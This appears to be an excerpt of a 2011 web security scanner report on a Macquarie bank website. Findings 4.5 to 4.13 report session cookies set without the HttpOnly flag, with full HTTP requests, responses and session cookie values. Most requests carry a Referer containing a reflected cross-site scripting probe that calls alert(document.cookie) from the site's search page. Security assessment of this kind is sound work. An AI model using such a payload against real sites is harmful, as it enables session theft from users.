x-hp-cam-color: V=1;ServerAddr=cf+Ihuwjl/t8tj3quRifUw==;GUID=1|K4XbXu_TjrYU0ZPoZMItn3vwG1D0tsphyMw2h1fEISPX2gmWNddGiYvhkqpNa40F|L21nbC9hdS9wZXJzb25hbC9maW5hbmNpYWwtYWR2aWNlL3N0cmF0ZWdpYy13ZWFsdGgtbWFuYWdlbWVudA..
Set-Cookie: JSESSIONID=05A5DF2608AC01CC5A4CFFC499D5AC21; Path=/mgl/au/personal; Secure
Set-Cookie: PD-S-SESSION-ID=2_1mU8KcPcYuclxV-kvu+CinXJ9ffnVhmdDQHAQBw1Tek+lL3k; Path=/; Secure; HttpOnly
Set-Cookie: TS529c02=6d3121c4af65fef40e668ee7fb3732cf36824e21333054354e81ded2a3a2c207ffffffff60ac0ec51f6c9215e902011a5072448faac4ce84002f3168; Max-Age=900; Path=/
Set-Cookie: TS56ffcb=512364cc00d5eeddc99bfda3c4741b5e36824e21333054354e81db99a3a2c207ffffffff60ac0ec591176cf2; Max-Age=900; Path=/mgl/au/personal
Content-Length: 114645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Strategic Wealth Ma
...[SNIP]...

4.5. https://www.macquarie.com.au/mgl/au/personal/js/core/jquery-1.4.2.js previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/js/core/jquery-1.4.2.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=A31536A014FE93D8F0DED63C72AC0DBC; Path=/mgl/au/personal; Secure
PD_STATEFUL_553a44c4-1a3a-4def-542f-00145e3c444a=%2Fmgl%2Fau%2Fpersonal; Path=/
TS529c02=75dfae8b192c3278d033a4a615f72d0036824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448fe4c462f05072448f; Max-Age=900; Path=/
TS56ffcb=805e12e29c285a78695c31fb4923ffbd36824e21333054354e81df4ca3a2c207ffffffff60ac0ec5b8bbade2e902011a5072448f; Max-Age=900; Path=/mgl/au/personal

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mgl/au/personal/js/core/jquery-1.4.2.js HTTP/1.1
Host: www.macquarie.com.au
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.macquarie.com.au/mgl/au/personal/search-results?portal=personal&query=xss+interest+bond+mortgage244e5%3C/script%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E17967e3e96&x=10&y=6
Cookie: TS529c02=e52ff51d9f51295cd3c976ab4d79831536824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448f

Response

HTTP/1.1 200 OK
content-length: 72328
content-type: text/javascript
date: Tue, 27 Sep 2011 14:36:19 GMT
etag: W/"72328-1314586008000"
last-modified: Mon, 29 Aug 2011 02:46:48 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-powered-by: Servlet 2.4; JBoss-4.3.0.GA_CP02 (build: SVNTag=JBPAPP_4_3_0_GA_CP02 date=200808051050)/JBossWeb-2.0
Set-Cookie: JSESSIONID=A31536A014FE93D8F0DED63C72AC0DBC; Path=/mgl/au/personal; Secure
Set-Cookie: PD_STATEFUL_553a44c4-1a3a-4def-542f-00145e3c444a=%2Fmgl%2Fau%2Fpersonal; Path=/
Set-Cookie: TS529c02=75dfae8b192c3278d033a4a615f72d0036824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448fe4c462f05072448f; Max-Age=900; Path=/
Set-Cookie: TS56ffcb=805e12e29c285a78695c31fb4923ffbd36824e21333054354e81df4ca3a2c207ffffffff60ac0ec5b8bbade2e902011a5072448f; Max-Age=900; Path=/mgl/au/personal

/*!
* jQuery JavaScript Library v1.4.2
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Incl
...[SNIP]...

4.6. https://www.macquarie.com.au/mgl/au/personal/js/core/jquery-ui-1.8.1.js previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/js/core/jquery-ui-1.8.1.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=14494D57C2F949A33AE5401BA9B7BB78; Path=/mgl/au/personal; Secure
PD_STATEFUL_774a22c2-1a3a-4def-542f-00145e3c444a=%2Fmgl%2Fau%2Fpersonal; Path=/
TS529c02=6b750404976bd9d43300142d1262f18236824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448fb41d8a4b5072448f; Max-Age=900; Path=/
TS56ffcb=92ff4c972dfea93490410c5f108aae0e36824e21333054354e81df4ca3a2c207ffffffff60ac0ec5aff4167ae902011a5072448f; Max-Age=900; Path=/mgl/au/personal

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mgl/au/personal/js/core/jquery-ui-1.8.1.js HTTP/1.1
Host: www.macquarie.com.au
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.macquarie.com.au/mgl/au/personal/search-results?portal=personal&query=xss+interest+bond+mortgage244e5%3C/script%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E17967e3e96&x=10&y=6
Cookie: TS529c02=e52ff51d9f51295cd3c976ab4d79831536824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448f

Response

HTTP/1.1 200 OK
content-length: 167930
content-type: text/javascript
date: Tue, 27 Sep 2011 14:36:17 GMT
etag: W/"167930-1314586008000"
last-modified: Mon, 29 Aug 2011 02:46:48 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-powered-by: Servlet 2.4; JBoss-4.3.0.GA_CP02 (build: SVNTag=JBPAPP_4_3_0_GA_CP02 date=200808051050)/JBossWeb-2.0
x-hp-cam-color: V=1;ServerAddr=hGxkDHu27up0Ysu66w1t2g==;GUID=1|0PXLt2T7f_HH8EwQQo5ARTxsQt9Sy7Rxq7BC9VCb2KiyTcjuwkbdR0-XWVQt0qZ-|L21nbC9hdS9wZXJzb25hbC9qcy9jb3JlL2pxdWVyeS11aS0xLjguMS5qcw..
Set-Cookie: JSESSIONID=14494D57C2F949A33AE5401BA9B7BB78; Path=/mgl/au/personal; Secure
Set-Cookie: PD_STATEFUL_774a22c2-1a3a-4def-542f-00145e3c444a=%2Fmgl%2Fau%2Fpersonal; Path=/
Set-Cookie: TS529c02=6b750404976bd9d43300142d1262f18236824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448fb41d8a4b5072448f; Max-Age=900; Path=/
Set-Cookie: TS56ffcb=92ff4c972dfea93490410c5f108aae0e36824e21333054354e81df4ca3a2c207ffffffff60ac0ec5aff4167ae902011a5072448f; Max-Age=900; Path=/mgl/au/personal

/*!
* jQuery UI 1.8.1
*
* Copyright (c) 2010 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://docs
...[SNIP]...

4.7. https://www.macquarie.com.au/mgl/au/personal/js/core/mac-libraries.js previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/js/core/mac-libraries.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=384783D0E00CF2C70FAAD71049E14044; Path=/mgl/au/personal; Secure
PD_STATEFUL_774a22c2-1a3a-4def-542f-00145e3c444a=%2Fmgl%2Fau%2Fpersonal; Path=/
TS529c02=6b750404976bd9d43300142d1262f18236824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448fb41d8a4b5072448f; Max-Age=900; Path=/
TS56ffcb=9a1c4188433aa226a3e740190278cc0d36824e21333054354e81df4ca3a2c207ffffffff60ac0ec5d05afeefe902011a5072448f; Max-Age=900; Path=/mgl/au/personal

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mgl/au/personal/js/core/mac-libraries.js HTTP/1.1
Host: www.macquarie.com.au
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.macquarie.com.au/mgl/au/personal/search-results?portal=personal&query=xss+interest+bond+mortgage244e5%3C/script%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E17967e3e96&x=10&y=6
Cookie: TS529c02=e52ff51d9f51295cd3c976ab4d79831536824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448f

Response

HTTP/1.1 200 OK
content-length: 132215
content-type: text/javascript
date: Tue, 27 Sep 2011 14:36:20 GMT
etag: W/"132215-1314586008000"
last-modified: Mon, 29 Aug 2011 02:46:48 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-powered-by: Servlet 2.4; JBoss-4.3.0.GA_CP02 (build: SVNTag=JBPAPP_4_3_0_GA_CP02 date=200808051050)/JBossWeb-2.0
x-hp-cam-color: V=1;ServerAddr=hGxkDHu27up0Ysu66w1t2g==;GUID=1|0PXLt2T7f_HH8EwQQo5ARTxsQt9Sy7Rxq7BC9VCb2KiyTcjuwkbdR0-XWVQt0qZ-|L21nbC9hdS9wZXJzb25hbC9qcy9jb3JlL21hYy1saWJyYXJpZXMuanM.
Set-Cookie: JSESSIONID=384783D0E00CF2C70FAAD71049E14044; Path=/mgl/au/personal; Secure
Set-Cookie: PD_STATEFUL_774a22c2-1a3a-4def-542f-00145e3c444a=%2Fmgl%2Fau%2Fpersonal; Path=/
Set-Cookie: TS529c02=6b750404976bd9d43300142d1262f18236824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448fb41d8a4b5072448f; Max-Age=900; Path=/
Set-Cookie: TS56ffcb=9a1c4188433aa226a3e740190278cc0d36824e21333054354e81df4ca3a2c207ffffffff60ac0ec5d05afeefe902011a5072448f; Max-Age=900; Path=/mgl/au/personal

/*! Copyright (c) 2010 Brandon Aaron (http://brandonaaron.net)
* Licensed under the MIT License (LICENSE.txt).
*
* Version 2.1.3-pre
*/

(function($){

$.fn.bgiframe = ($.browser.msie && /msie
...[SNIP]...

4.8. https://www.macquarie.com.au/mgl/au/personal/js/swfobject.js previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/js/swfobject.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=5E65C4D301CDFB580091588465311E83; Path=/mgl/au/personal; Secure
PD_STATEFUL_543a95c9-1a3a-4def-542f-00145e3c444a=%2Fmgl%2Fau%2Fpersonal; Path=/
TS529c02=e52ff51d9f51295cd3c976ab4d79831536824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448f; Max-Age=900; Path=/
TS56ffcb=797265576906e797b1b904338b2324a036824e21333054354e81df4ca3a2c207ffffffff60ac0ec580d2844ee902011a5072448f; Max-Age=900; Path=/mgl/au/personal

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mgl/au/personal/js/swfobject.js HTTP/1.1
Host: www.macquarie.com.au
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.macquarie.com.au/mgl/au/personal/search-results?portal=personal&query=xss+interest+bond+mortgage244e5%3C/script%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E17967e3e96&x=10&y=6
Cookie: TS529c02=e52ff51d9f51295cd3c976ab4d79831536824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448f

Response

HTTP/1.1 200 OK
content-length: 10220
content-type: text/javascript
date: Tue, 27 Sep 2011 14:36:19 GMT
etag: W/"10220-1314586010000"
last-modified: Mon, 29 Aug 2011 02:46:50 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-powered-by: Servlet 2.4; JBoss-4.3.0.GA_CP02 (build: SVNTag=JBPAPP_4_3_0_GA_CP02 date=200808051050)/JBossWeb-2.0
x-hp-cam-color: V=1;ServerAddr=cf+Ihuwjl/t8tj3quRifUw==;GUID=1|K4XbXu_TjrYU0ZPoZMItn3vwG1D0tsphyMw2h1fEISPX2gmWNddGiYvhkqpNa40F|L21nbC9hdS9wZXJzb25hbC9qcy9zd2ZvYmplY3QuanM.
Set-Cookie: JSESSIONID=5E65C4D301CDFB580091588465311E83; Path=/mgl/au/personal; Secure
Set-Cookie: PD_STATEFUL_543a95c9-1a3a-4def-542f-00145e3c444a=%2Fmgl%2Fau%2Fpersonal; Path=/
Set-Cookie: TS529c02=e52ff51d9f51295cd3c976ab4d79831536824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448f; Max-Age=900; Path=/
Set-Cookie: TS56ffcb=797265576906e797b1b904338b2324a036824e21333054354e81df4ca3a2c207ffffffff60ac0ec580d2844ee902011a5072448f; Max-Age=900; Path=/mgl/au/personal

/* SWFObject v2.2 <http://code.google.com/p/swfobject/>
is released under the MIT License <http://www.opensource.org/licenses/mit-license.php>
*/
var swfobject=function(){var D="undefined",r="objec
...[SNIP]...

4.9. https://www.macquarie.com.au/mgl/au/personal/loans/home-loans previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/loans/home-loans

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=3DD107D9445E65C2E30F1550072B02BA; Path=/mgl/au/personal; Secure
TS529c02=4d7196d087ea27197b0e1154f5504630d7910ed46fa150cd4e81de4eaac4ce84002f3168a3a2c207ffffffff60ac0ec52a841a0f; Max-Age=900; Path=/
TS56ffcb=675450af7575e0d7591ff9edd03ccad436824e21333054354e81db99a3a2c207ffffffff60ac0ec5d3578ee6; Max-Age=900; Path=/mgl/au/personal

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mgl/au/personal/loans/home-loans HTTP/1.1
Host: www.macquarie.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html;charset=UTF-8
date: Tue, 27 Sep 2011 14:31:52 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-old-content-length: 115252
x-powered-by: Servlet 2.4; JBoss-4.3.0.GA_CP02 (build: SVNTag=JBPAPP_4_3_0_GA_CP02 date=200808051050)/JBossWeb-2.0, JSF/1.2
x-hp-cam-color: V=1;ServerAddr=cf+Ihuwjl/t8tj3quRifUw==;GUID=1|K4XbXu_TjrYU0ZPoZMItn3vwG1D0tsphyMw2h1fEISPX2gmWNddGiYvhkqpNa40F|L21nbC9hdS9wZXJzb25hbC9sb2Fucy9ob21lLWxvYW5z
Set-Cookie: JSESSIONID=3DD107D9445E65C2E30F1550072B02BA; Path=/mgl/au/personal; Secure
Set-Cookie: PD-S-SESSION-ID=2_1mU8KcPcYuclxV-kvu+CinXJ9ffnVhmdDQHAQBw1Tek+lL3k; Path=/; Secure; HttpOnly
Set-Cookie: TS529c02=4d7196d087ea27197b0e1154f5504630d7910ed46fa150cd4e81de4eaac4ce84002f3168a3a2c207ffffffff60ac0ec52a841a0f; Max-Age=900; Path=/
Set-Cookie: TS56ffcb=675450af7575e0d7591ff9edd03ccad436824e21333054354e81db99a3a2c207ffffffff60ac0ec5d3578ee6; Max-Age=900; Path=/mgl/au/personal

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Home loan product c
...[SNIP]...

4.10. https://www.macquarie.com.au/mgl/au/personal/personal/images/ajax-loader-small.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/personal/images/ajax-loader-small.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=211E8BDFA2A963777B18B1B4728A988B; Path=/mgl/au/personal; Secure
PD_STATEFUL_543a95c9-1a3a-4def-542f-00145e3c444a=%2Fmgl%2Fau%2Fpersonal; Path=/
TS529c02=e52ff51d9f51295cd3c976ab4d79831536824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448f; Max-Age=900; Path=/
TS56ffcb=7353404d7e3ec623c865ac1e4a9260f536824e21333054354e81df4ca3a2c207ffffffff60ac0ec5cfbc8e60e902011a5072448f; Max-Age=900; Path=/mgl/au/personal

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mgl/au/personal/personal/images/ajax-loader-small.gif HTTP/1.1
Host: www.macquarie.com.au
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.macquarie.com.au/mgl/au/personal/search-results?portal=personal&query=xss+interest+bond+mortgage244e5%3C/script%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E17967e3e96&x=10&y=6
Cookie: TS529c02=e52ff51d9f51295cd3c976ab4d79831536824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448f

Response

HTTP/1.1 200 OK
content-length: 1849
content-type: image/gif
date: Tue, 27 Sep 2011 14:36:21 GMT
etag: W/"1849-1314585984000"
last-modified: Mon, 29 Aug 2011 02:46:24 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-powered-by: Servlet 2.4; JBoss-4.3.0.GA_CP02 (build: SVNTag=JBPAPP_4_3_0_GA_CP02 date=200808051050)/JBossWeb-2.0
x-hp-cam-color: V=1;ServerAddr=cf+Ihuwjl/t8tj3quRifUw==;GUID=1|K4XbXu_TjrYU0ZPoZMItn3vwG1D0tsphyMw2h1fEISPX2gmWNddGiYvhkqpNa40F|L21nbC9hdS9wZXJzb25hbC9wZXJzb25hbC9pbWFnZXMvYWpheC1sb2FkZXItc21hbGwuZ2lm
Set-Cookie: JSESSIONID=211E8BDFA2A963777B18B1B4728A988B; Path=/mgl/au/personal; Secure
Set-Cookie: PD_STATEFUL_543a95c9-1a3a-4def-542f-00145e3c444a=%2Fmgl%2Fau%2Fpersonal; Path=/
Set-Cookie: TS529c02=e52ff51d9f51295cd3c976ab4d79831536824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448f; Max-Age=900; Path=/
Set-Cookie: TS56ffcb=7353404d7e3ec623c865ac1e4a9260f536824e21333054354e81df4ca3a2c207ffffffff60ac0ec5cfbc8e60e902011a5072448f; Max-Age=900; Path=/mgl/au/personal

GIF89a......................FFFzzz...XXX$$$...............666hhh.............................................!..NETSCAPE2.0.....!..Created with ajaxload.info.!..
...,..........w .. !...DB..A..H.....
...[SNIP]...

4.11. https://www.macquarie.com.au/mgl/au/personal/personal/images/butonArrow.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/personal/images/butonArrow.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=E14EB47F1DB611D8E549962CC33C1B67; Path=/mgl/au/personal; Secure
TS529c02=75dfae8b192c3278d033a4a615f72d0036824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448fe4c462f05072448f; Max-Age=900; Path=/
TS56ffcb=636c82540acc74f6ff551fbcada48d5c36824e21333054354e81df4ca3a2c207ffffffff60ac0ec5e51fa032e902011a5072448f; Max-Age=900; Path=/mgl/au/personal

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mgl/au/personal/personal/images/butonArrow.gif HTTP/1.1
Host: www.macquarie.com.au
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.macquarie.com.au/mgl/au/personal/search-results?portal=personal&query=xss+interest+bond+mortgage244e5%3C/script%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E17967e3e96&x=10&y=6
Cookie: JSESSIONID=A31536A014FE93D8F0DED63C72AC0DBC; TS56ffcb=805e12e29c285a78695c31fb4923ffbd36824e21333054354e81df4ca3a2c207ffffffff60ac0ec5b8bbade2e902011a5072448f; TS529c02=75dfae8b192c3278d033a4a615f72d0036824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448fe4c462f05072448f; PD_STATEFUL_774a22c2-1a3a-4def-542f-00145e3c444a=%2Fmgl%2Fau%2Fpersonal; PD_STATEFUL_553a44c4-1a3a-4def-542f-00145e3c444a=%2Fmgl%2Fau%2Fpersonal

Response

HTTP/1.1 200 OK
content-length: 51
content-type: image/gif
date: Tue, 27 Sep 2011 14:36:21 GMT
etag: W/"51-1314585984000"
last-modified: Mon, 29 Aug 2011 02:46:24 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-powered-by: Servlet 2.4; JBoss-4.3.0.GA_CP02 (build: SVNTag=JBPAPP_4_3_0_GA_CP02 date=200808051050)/JBossWeb-2.0
x-hp-cam-color: V=1;ServerAddr=hGxkDHu27up0Ysu66w1t2g==;GUID=1|0PXLt2T7f_HH8EwQQo5ARTxsQt9Sy7Rxq7BC9VCb2KiyTcjuwkbdR0-XWVQt0qZ-|L21nbC9hdS9wZXJzb25hbC9wZXJzb25hbC9pbWFnZXMvYnV0b25BcnJvdy5naWY.
Set-Cookie: JSESSIONID=E14EB47F1DB611D8E549962CC33C1B67; Path=/mgl/au/personal; Secure
Set-Cookie: TS529c02=75dfae8b192c3278d033a4a615f72d0036824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448fe4c462f05072448f; Max-Age=900; Path=/
Set-Cookie: TS56ffcb=636c82540acc74f6ff551fbcada48d5c36824e21333054354e81df4ca3a2c207ffffffff60ac0ec5e51fa032e902011a5072448f; Max-Age=900; Path=/mgl/au/personal

GIF89a.. ..........!.......,...... ...
...........;

4.12. https://www.macquarie.com.au/mgl/au/personal/personal/images/macquarie_personal_print_logo.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/personal/images/macquarie_personal_print_logo.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=0FC0EDB11F082CECF0800D3E8E5030E4; Path=/mgl/au/personal; Secure
PD_STATEFUL_553a44c4-1a3a-4def-542f-00145e3c444a=%2Fmgl%2Fau%2Fpersonal; Path=/
TS529c02=75dfae8b192c3278d033a4a615f72d0036824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448fe4c462f05072448f; Max-Age=900; Path=/
TS56ffcb=d2ce6d42c45f8a2f1373d7e25659eb6c36824e21333054354e81df4ca3a2c207ffffffff60ac0ec5850159d2e902011a5072448f; Max-Age=900; Path=/mgl/au/personal

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mgl/au/personal/personal/images/macquarie_personal_print_logo.gif HTTP/1.1
Host: www.macquarie.com.au
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.macquarie.com.au/mgl/au/personal/search-results?portal=personal&query=xss+interest+bond+mortgage244e5%3C/script%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E17967e3e96&x=10&y=6
Cookie: TS529c02=e52ff51d9f51295cd3c976ab4d79831536824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448f

Response

HTTP/1.1 200 OK
content-length: 2238
content-type: image/gif
date: Tue, 27 Sep 2011 14:36:21 GMT
etag: W/"2238-1314585986000"
last-modified: Mon, 29 Aug 2011 02:46:26 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-powered-by: Servlet 2.4; JBoss-4.3.0.GA_CP02 (build: SVNTag=JBPAPP_4_3_0_GA_CP02 date=200808051050)/JBossWeb-2.0
Set-Cookie: JSESSIONID=0FC0EDB11F082CECF0800D3E8E5030E4; Path=/mgl/au/personal; Secure
Set-Cookie: PD_STATEFUL_553a44c4-1a3a-4def-542f-00145e3c444a=%2Fmgl%2Fau%2Fpersonal; Path=/
Set-Cookie: TS529c02=75dfae8b192c3278d033a4a615f72d0036824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448fe4c462f05072448f; Max-Age=900; Path=/
Set-Cookie: TS56ffcb=d2ce6d42c45f8a2f1373d7e25659eb6c36824e21333054354e81df4ca3a2c207ffffffff60ac0ec5850159d2e902011a5072448f; Max-Age=900; Path=/mgl/au/personal

GIF89a-.<.......@@@...............``` 000PPP...ppp.........................................................!.......,....-.<.... $.di.......p,.tm.x..|....#0x...A.. ....tJ.Zq.G..."...uL...h.@.m..
AzN.
...[SNIP]...

4.13. https://www.macquarie.com.au/mgl/au/personal/personal/images/spacer.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/personal/images/spacer.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=E7DBF741060924D0C7B297B9E5F9DA89; Path=/mgl/au/personal; Secure
TS529c02=75dfae8b192c3278d033a4a615f72d0036824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448fe4c462f05072448f; Max-Age=900; Path=/
TS56ffcb=a74611c34689e2e1c41e28391a98e13836824e21333054354e81df4ca3a2c207ffffffff60ac0ec57d321d21e902011a5072448f; Max-Age=900; Path=/mgl/au/personal

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mgl/au/personal/personal/images/spacer.gif HTTP/1.1
Host: www.macquarie.com.au
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.macquarie.com.au/mgl/au/personal/search-results?portal=personal&query=xss+interest+bond+mortgage244e5%3C/script%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E17967e3e96&x=10&y=6
Cookie: JSESSIONID=A31536A014FE93D8F0DED63C72AC0DBC; TS56ffcb=805e12e29c285a78695c31fb4923ffbd36824e21333054354e81df4ca3a2c207ffffffff60ac0ec5b8bbade2e902011a5072448f; TS529c02=75dfae8b192c3278d033a4a615f72d0036824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448fe4c462f05072448f; PD_STATEFUL_774a22c2-1a3a-4def-542f-00145e3c444a=%2Fmgl%2Fau%2Fpersonal; PD_STATEFUL_553a44c4-1a3a-4def-542f-00145e3c444a=%2Fmgl%2Fau%2Fpersonal

Response

HTTP/1.1 200 OK
content-length: 43
content-type: image/gif
date: Tue, 27 Sep 2011 14:36:21 GMT
etag: W/"43-1314585984000"
last-modified: Mon, 29 Aug 2011 02:46:24 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-powered-by: Servlet 2.4; JBoss-4.3.0.GA_CP02 (build: SVNTag=JBPAPP_4_3_0_GA_CP02 date=200808051050)/JBossWeb-2.0
